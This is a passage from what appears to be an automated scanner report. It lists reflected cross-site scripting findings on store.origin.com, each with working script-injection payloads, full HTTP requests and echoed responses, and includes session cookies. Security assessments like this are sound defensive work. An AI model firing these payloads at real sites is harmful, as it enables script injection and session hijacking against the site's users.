GET /?412c5--><script>alert(1)</script>d59f8e2efa2=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=154926219549,0)
Date: Fri, 24 Jun 2011 13:44:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 60544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308923040451:NODE=c2a4901:THREA
...[SNIP]...
<!--!esi:include src="/store?412c5--><script>alert(1)</script>d59f8e2efa2=1&Action=DisplayESIPage&Currency=USD&ESIHC=bf89624e&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage&script>
...[SNIP]...

4.85. http://store.origin.com/DRHM/store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 26d07--><script>alert(1)</script>60365ea3b11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE&26d07--><script>alert(1)</script>60365ea3b11=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/DRHM/store%25253FAction%25253DContinueShopping%252526SiteID%25253Dea%252526Locale%25253Den_US%252526ThemeID%25253D718200%252526Env%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=142044730526,0)
Date: Fri, 24 Jun 2011 14:39:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 64955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926373194:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?26d07--><script>alert(1)</script>60365ea3b11=1&Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage"-->
...[SNIP]...

4.86. http://store.origin.com/servlet/ControllerServlet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /servlet/ControllerServlet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 970ec<x%20style%3dx%3aexpression(alert(1))>1e64672ebab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 970ec<x style=x:expression(alert(1))>1e64672ebab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /servlet/ControllerServlet?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1&970ec<x%20style%3dx%3aexpression(alert(1))>1e64672ebab=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response (redirected)

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: VISITOR_ID=971D4E8DFAED4367E8FABBC8C336D7CFAFA20171532B684A; expires=Sat, 23-Jun-2012 20:31:09 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=116275073079,0)
Date: Fri, 24 Jun 2011 14:41:57 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 396


<!-- REQUEST ID: TIME=1308926517144:NODE=c2a4201:THREAD=47 -->
<!--!esi:include src="/store?970ec<x style=x:expression(alert(1))>1e64672ebab=1&Action=DisplayESIPage&Currency=USD&ESIHC=944044ed&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=173741100&cename=ProductFinder&id=ProductFinderLogicPage&objectID=54552300&option=1"-->
...[SNIP]...

4.87. http://store.origin.com/servlet/ControllerServlet [objectID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /servlet/ControllerServlet

Issue detail

The value of the objectID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7896e%3balert(1)//e97f0c45884 was submitted in the objectID parameter. This input was echoed as 7896e;alert(1)//e97f0c45884 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servlet/ControllerServlet?Action=DisplayPage&id=ProductFinderJSPage&Locale=en_US&SiteID=ea&objectID=545523007896e%3balert(1)//e97f0c45884 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response (redirected)

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=99095095834,0)
Date: Fri, 24 Jun 2011 14:40:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 6948


<!-- REQUEST ID: TIME=1308926410564:NODE=c2a4201:THREAD=36 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=173
...[SNIP]...

//document.getElementById("dr_load").style.display = "none";
loadMessage("off");
changeSelectState(false);
}
}
dataRequest(545523007896e;alert(1)//e97f0c45884,1);


<!--!/esi:include -->
...[SNIP]...

4.88. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b9d22<x%20style%3dx%3aexpression(alert(1))>5630e67cca4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9d22<x style=x:expression(alert(1))>5630e67cca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1&b9d22<x%20style%3dx%3aexpression(alert(1))>5630e67cca4=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=197879135792,0)
Date: Fri, 24 Jun 2011 14:36:47 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 398


<!-- REQUEST ID: TIME=1308926207827:NODE=c2a5301:THREAD=3806 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=d9487485&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&b9d22<x style=x:expression(alert(1))>5630e67cca4=1&ceid=172065900&cename=ProductFinder&id=ProductFinderLogicPage&objectID=54552300&option=1"-->
...[SNIP]...

4.89. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7353c--><script>alert(1)</script>772938624bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage&7353c--><script>alert(1)</script>772938624bb=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253APRODUCTFINDERPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/AddItemToRequisition/ThemeID.718200%252526productID%25253D226783800%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=107684976519,0)
Date: Fri, 24 Jun 2011 14:39:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 26212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926357939:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?7353c--><script>alert(1)</script>772938624bb=1&Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=ThreePgCheckoutShopping
...[SNIP]...

4.90. http://store.origin.com/store [objectID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The value of the objectID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 30c70%3balert(1)//bd42b8ad6f6 was submitted in the objectID parameter. This input was echoed as 30c70;alert(1)//bd42b8ad6f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /store?Action=DisplayPage&id=ProductFinderJSPage&Locale=en_US&SiteID=ea&objectID=5455230030c70%3balert(1)//bd42b8ad6f6 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21785430387,0)
Date: Fri, 24 Jun 2011 14:36:02 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 6952


<!-- REQUEST ID: TIME=1308926162482:NODE=c2a5301:THREAD=1735 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=1
...[SNIP]...

//document.getElementById("dr_load").style.display = "none";
loadMessage("off");
changeSelectState(false);
}
}
dataRequest(5455230030c70;alert(1)//bd42b8ad6f6,1);


<!--!/esi:include -->
...[SNIP]...

4.91. http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a9c7d--><script>alert(1)</script>84252b80866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--><script>alert(1)</script>84252b80866=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.11.49:260-0#0"; JSESSIONID=7FD36F5B7EF2D6619ACFC964D7FBFAC2; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=822805002.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64731921166,0)
Date: Fri, 24 Jun 2011 13:44:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 38619


<!-- REQUEST ID: TIME=1308923054923:NODE=c2a4901:THREAD=36 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=bf89624e&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&a9c7d--><script>alert(1)</script>84252b80866=1&ceid=173715400&cename=HomeTier3&id=HomeTier3Page&script>
...[SNIP]...

4.92. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 52629--><script>alert(1)</script>32e863371e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800?52629--><script>alert(1)</script>32e863371e0=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=172109476423,0)
Date: Fri, 24 Jun 2011 14:39:08 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 40166


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926348703:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?52629--><script>alert(1)</script>32e863371e0=1&Action=DisplayESIPage&Currency=USD&ESIHC=24e5cc79&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1476100&StyleVersion=12&ThemeID=718200&ceid=173716600&cename=TopHeader&id=ProductFinderPage&productID=219720
...[SNIP]...

4.93. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload be90c--><script>alert(1)</script>39260cc850a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800?be90c--><script>alert(1)</script>39260cc850a=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(1)%3C/script%3E84252b80866=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=129159595100,0)
Date: Fri, 24 Jun 2011 14:35:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 40083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926145188:NODE=c2a5301:THREA
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1476100&StyleVersion=12&ThemeID=718200&be90c--><script>alert(1)</script>39260cc850a=1&ceid=173716600&cename=TopHeader&id=ProductFinderPage&productID=226783800&script>
...[SNIP]...

4.94. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/pd/ThemeID.718200/productID.201797000

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cba28--><script>alert(1)</script>988e2a37d0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/pd/ThemeID.718200/productID.201797000?cba28--><script>alert(1)</script>988e2a37d0c=1 HTTP/1.1
Host: store.origin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(0x062)%3C/script%3E84252b80866=1
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=688587274.260.0000; ORA_WX_SESSION=10.2.11.49:260-0#0; JSESSIONID=D16C78DD65928965E35E73DFD8E01BF0; VISITOR_ID=971D4E8DFAED43671E5F8C17C533E4FF95647E15D19DC326

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21784804153,0)
Date: Fri, 24 Jun 2011 14:25:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app41
Content-Length: 75613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308925551009:NODE=c2a4101:THREA
...[SNIP]...
